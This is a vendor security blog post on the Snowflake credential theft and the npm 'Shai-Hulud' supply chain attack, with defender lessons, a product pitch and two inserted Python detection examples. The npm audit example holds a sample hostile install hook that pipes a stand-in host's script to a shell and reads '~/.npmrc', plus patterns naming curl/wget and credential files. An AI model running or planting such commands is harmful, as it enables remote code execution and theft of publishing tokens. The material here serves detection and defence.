TL;DR
The Snowflake data incident (2024) and the NPM "Shai-Hulud" supply chain attack (2025) both featured stolen credentials.
Organizations should implement zero trust security principles like visibility and security policy enforcement to protect their data.
Credentials: The Real Weak Link
Massive cyber incidents are sadly becoming routine. And while many compromises are traced back to a vulnerability or misconfiguration, the most damaging attacks today increasingly rely on valid accounts. In other words: attackers don’t need an advanced exploit when they can just steal your house keys and walk through the front door.
This isn’t a niche problem or a rare headline. Stolen credentials are affecting millions of users and companies worldwide every single day. The tools to harvest them are cheap and easy to get, and the payoff is enormous. If your organization treats identity like an afterthought, you’re a target.
The Snowflake data incident (2024) hinged on credentials stolen by infostealer malware. Because the accounts lacked MFA, attackers logged in as legitimate users and exfiltrated data at scale.
The NPM “Shai-Hulud” supply chain attack (2025) compromised maintainer accounts via phishing. Once inside, attackers used those valid credentials to push malicious updates into hundreds of packages, spreading risk downstream fast.
Neither case required elite hacking skills. Both worked because identity was the weak spot, and that’s the part too many teams ignore until it’s front-page news. With valid credentials in hand, attackers save time and dramatically reduce their chances of being detected. There are no malware signatures to trip alarms. They can just walk right in.
What Happened in the Snowflake Incident
According to Mandiant, Snowflake’s customer environments were compromised when the UNC5537 group used malware-harvested credentials, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and METASTEALER, to log into accounts that didn’t require MFA.
Because those accounts lacked MFA, attackers were able to log in as valid users, access sensitive datasets, and exfiltrate large volumes of customer information.
Dark Reading published an article stating that some of the credentials identified in infostealer malware output had been for sale on the Dark Web for years and were still valid, meaning they had never been rotated or updated. It’s a reminder that we still struggle with basic security hygiene, and that a simple oversight like not rotating credentials can snowball into a full-blown incident. As many as 165 organizations were impacted, including Ticketmaster, Santander, and AT&T.
What Happened in the NPM Supply Chain Attack
In 2025, attackers targeted NPM maintainers with phishing, stealing valid publishing tokens. These were used to push malicious versions of widely used packages like debug and chalk. The malware:
Planted post-install scripts to exfiltrate secrets.
Leveraged worm-like propagation to infect other packages controlled by the same maintainer.
Harvested tokens, GitHub credentials, and cloud provider keys for further compromise.
In hours, over 500 packages were poisoned, and countless downstream projects were at risk. That meant not only developers but also end users and businesses depending on those packages were suddenly exposed. Applications could inherit malicious code, sensitive data could be siphoned off, and organizations faced the costly work of auditing, patching, and rebuilding trust.
If you’ve ever had a dependency chain break your build, imagine that, but with malware spreading through your supply chain and a cleanup that disrupts teams, slows delivery, and damages confidence. Popular open-source projects saw downloads of these poisoned packages spike into the millions before removal, amplifying the risk to companies and users alike.
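The install-hook mechanism described above is something a defender can check for directly. The following is an added example, not code from the original post or from Aviatrix: it audits package.json manifests (from a real node_modules tree, or the constructed samples embedded here) for preinstall/install/postinstall hooks and flags commands that fetch remote code or touch credential files. The pattern list and sample manifests are constructed for illustration.

```python
# Added example (not from the original post or Aviatrix): audit npm packages
# for install-time lifecycle hooks, the mechanism the post describes, and flag
# hook commands that fetch remote code or read credential files.
import json
import os
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Constructed heuristics; any install hook still deserves manual review.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(curl|wget)\b"),                               # remote fetch
    re.compile(r"\.npmrc|\.aws/credentials|\.git-credentials"),   # secret stores
    re.compile(r"base64\s+(-d|--decode)|node\s+-e\b"),            # inline/obfuscated code
]

def audit_package(name, manifest):
    """Return one finding per install-time hook the package declares."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(cmd)]
            findings.append({"package": name, "hook": hook, "command": cmd,
                             "suspicious": bool(hits)})
    return findings

def audit_manifests(manifests):
    """Audit a mapping of package name -> parsed package.json, sorted by name."""
    return [f for name in sorted(manifests) for f in audit_package(name, manifests[name])]

def load_node_modules(root):
    """Collect package.json files from a real node_modules tree on disk."""
    manifests = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            try:
                with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                    manifest = json.load(fh)
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: skip, do not crash the audit
            manifests[manifest.get("name", dirpath)] = manifest
    return manifests

# Constructed sample manifests: a benign native build hook, a hook that pulls
# remote code and reads the npm token file, and a package with no hooks at all.
SAMPLE_MANIFESTS = {
    "good-native-lib": {"scripts": {"install": "node-gyp rebuild"}},
    "evil-pkg": {"scripts": {"postinstall": "curl -s http://example.invalid/x.sh | sh; cat ~/.npmrc"}},
    "plain-lib": {"scripts": {"test": "jest"}},
}
```

Run `audit_manifests(load_node_modules("node_modules"))` in a project to list every package that executes code at install time; pairing this with `ignore-scripts=true` in `.npmrc` and an explicit allowlist of build hooks keeps the check enforceable.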
Common Theme: Valid Accounts, Assumed Trust
Snowflake and NPM may look different, a data warehouse incident versus an open-source supply chain attack, but both underscore the same lesson:
Attackers don’t need to break in if they can log in.
Today’s perimeter isn’t a firewall; it’s identity.
Zero trust is a strong philosophy, but unless it is operationalized everywhere, gaps remain.
And here’s the bigger point: these aren’t one-off headline events. This kind of attack is happening every day, all over the world, because credential harvesting is cheap, easy, and effective. Once inside, attackers often move almost freely, sometimes because best practices weren’t followed, sometimes because complexity and visibility gaps made it impossible to catch them quickly.
The NPM example also shows how much trust we place in third-party libraries. When that trust is broken, it can ripple straight into our environments. In this case, the worm-like malware wasn’t just spreading malicious code, it was stealing more credentials and fueling further compromises.
Translation: passwords alone are an open door.
Zero Trust Is a Start, Not an End
Zero Trust architecture (ZTA) shifts the mindset from implicit to explicit verification: least-privilege, continuous authentication, and monitoring. But implementing it across hybrid, multi-cloud, and SaaS ecosystems is complex.
Without a unifying approach, zero trust can leave critical blind spots in places like cross-cloud connections and MACsec encryption, gaps that attackers can (and will) exploit. That’s where Cloud Native Security Fabric comes in to provide a pervasive, holistic security solution that protects your entire network. And if you’ve been through enough incident post-mortems, you already know: complexity is the enemy, consistency is survival.
Lessons Learned for Defenders
The Snowflake and NPM incidents show that organizations need stronger identity controls, consistent policies, and better visibility across environments:
Strengthen authentication – MFA should be mandatory, and credentials should be rotated regularly.
Enforce consistent policies across SaaS, CSP, and on-prem environments – Identity-first policies need to be applied uniformly, no matter where workloads and accounts reside.
Improve visibility – Monitor for unusual behavior like bulk queries, odd API usage, or malicious package activity.
Watch egress traffic – Catch data exfiltration attempts to attacker infrastructure.
Invest in telemetry and intelligence – Map traffic, highlight anomalies, and make it actionable.
Harden and segment workloads – Assume compromise and design your infrastructure to be resilient, prepared, and contained before it happens.
The assumption is simple: credentials will be compromised. The lesson is to make sure those credentials can’t be abused undetected or unchecked. That means planning for compromise before it happens, so controls are already in place to contain the damage and limit attacker freedom once they are inside.
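The "strengthen authentication" and "improve visibility" lessons above translate into concrete detection logic. The following is an added example, not code from the original post or from Aviatrix: it runs over constructed login and query records (field names are assumptions, not any vendor's schema) and correlates the two signals the Snowflake write-ups describe, a successful login with no second factor and a bulk data pull far above the account's baseline.

```python
# Added example (not from the original post or Aviatrix): detection logic over
# constructed authentication and query records, correlating logins that had no
# second factor with bulk data pulls far above a per-user baseline.
from collections import defaultdict

# Constructed sample events. Field names are assumptions, not a vendor schema.
LOGIN_EVENTS = [
    {"user": "alice",   "success": True,  "second_factor": "DUO", "ip": "203.0.113.10"},
    {"user": "svc_etl", "success": True,  "second_factor": None,  "ip": "198.51.100.7"},
    {"user": "svc_etl", "success": True,  "second_factor": None,  "ip": "192.0.2.44"},
    {"user": "bob",     "success": False, "second_factor": None,  "ip": "203.0.113.12"},
]
QUERY_EVENTS = [
    {"user": "alice",   "rows": 1_200,     "statement": "SELECT ..."},
    {"user": "svc_etl", "rows": 50_000,    "statement": "SELECT ..."},
    {"user": "svc_etl", "rows": 9_000_000, "statement": "COPY INTO @stage ..."},
]
# Constructed per-user baselines, e.g. the 30-day median rows returned per window.
BASELINE_ROWS = {"alice": 2_000, "svc_etl": 60_000}

def logins_without_mfa(events):
    """Successful logins that completed with no second factor, user -> source IPs."""
    out = defaultdict(set)
    for e in events:
        if e["success"] and not e["second_factor"]:
            out[e["user"]].add(e["ip"])
    return dict(out)

def bulk_pull_alerts(events, baseline, factor=10):
    """Users whose rows returned in the window exceed `factor` x their baseline.

    An account with no baseline at all is treated as baseline 0, so any rows it
    returns alert: an unknown account pulling data is itself worth a look."""
    totals = defaultdict(int)
    for e in events:
        totals[e["user"]] += e["rows"]
    return {u: t for u, t in totals.items() if t > factor * baseline.get(u, 0)}

def correlate(logins, queries, baseline):
    """Highest priority: a bulk pull by an account that logged in without MFA."""
    no_mfa = logins_without_mfa(logins)
    bulk = bulk_pull_alerts(queries, baseline)
    return sorted(u for u in bulk if u in no_mfa)
```

In the sample data only svc_etl trips both rules; on its own, a no-MFA login from two distinct source IPs in one window is already a signal that a service credential has leaked.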
How Cloud Native Security Fabric (CNSF) Helps
Aviatrix Cloud Native Security Fabric (CNSF) embeds zero trust principles in the fabric of your network, eliminating the blind spots and vulnerabilities that allow attacks like Snowflake and NPM to succeed:
Authenticate and authorize based on workload identity – Move beyond static controls like IP addresses and ensure policies are tied to identity, enforcing least privilege across environments.
Segment networks effectively – Only the workloads, users, and accounts that truly need to communicate should be able to do so. This reduces the blast radius when compromise occurs.
Enforce consistent security policies – Use a central hub to apply uniform identity-first policies across SaaS, CSP, and on-prem environments.
Provide east-west and cross-cloud visibility – Eliminate blind spots by examining internal and cross-cloud traffic, not just north-south flows.
Offer visualization and telemetry – Map traffic patterns and deliver actionable intelligence to spot anomalies quickly.
Filter egress traffic – Inspect traffic leaving the environment to block data exfiltration attempts.
Takeaway
The Snowflake and NPM incidents prove the same point: credentials and valid accounts are a setup, not the end of the story. Attackers will get in. The real question is what they can do once they’re inside.
I’ve seen firsthand how damaging these attacks can be. Simple credential theft that looks like a minor issue on the surface can cascade into business disruption, regulatory headaches, and weeks of all-hands-on-deck response. Those scars stay with teams long after the headlines fade.
Security leaders must:
Assume valid account compromise is inevitable.
Limit what attackers can do once they log in by enforcing least privilege everywhere.
Build visibility and detection to spot misuse quickly.
Treat zero trust as a foundation, not a finish line.
Operationalize Cloud Native Security Fabric to shrink attacker freedom of movement and reduce the blast radius.
Credentials will be stolen. Attackers will get in. The difference between a nuisance and a catastrophe is how little they can do once inside. And that depends on whether you planned for compromise before it happened.
Learn how Aviatrix Cloud Native Security Fabric (CNSF) operationalizes the zero trust framework to provide comprehensive network protection.
Schedule a demo to see how CNSF provides pervasive security.
References
Cloud Security Alliance, “Unpacking the 2024 Snowflake Data Breach,” May 7, 2025, https://cloudsecurityalliance.org/blog/2025/05/07/unpacking-the-2024-snowflake-data-breach.
CyberScoop, “As many as 165 companies ‘potentially exposed’ in Snowflake-related attacks, Mandiant says,” June 10, 2024, https://cyberscoop.com/as-many-as-165-companies-potentially-exposed-in-snowflake-related-attacks-mandiant-says/.
Dark Reading, “Snowflake Account Attacks Driven by Exposed Legitimate Credentials,” July 17, 2024, https://www.darkreading.com/threat-intelligence/snowflake-account-attacks-driven-by-exposed-legitimate-credentials.
Mandiant, “UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion,” June 10, 2024, https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion.
GitHub Blog, “Our plan for a more secure npm supply chain,” September 22, 2025, https://github.blog/security/supply-chain-security/our-plan-for-a-more-secure-npm-supply-chain/.
CISA, “Widespread Supply Chain Compromise Impacting npm Ecosystem,” September 23, 2025, https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem.
Snowflake, “Multi-factor authentication (MFA),” accessed September 19, 2025, https://web.archive.org/web/20240605134313/https://docs.snowflake.com/en/user-guide/security-mfa.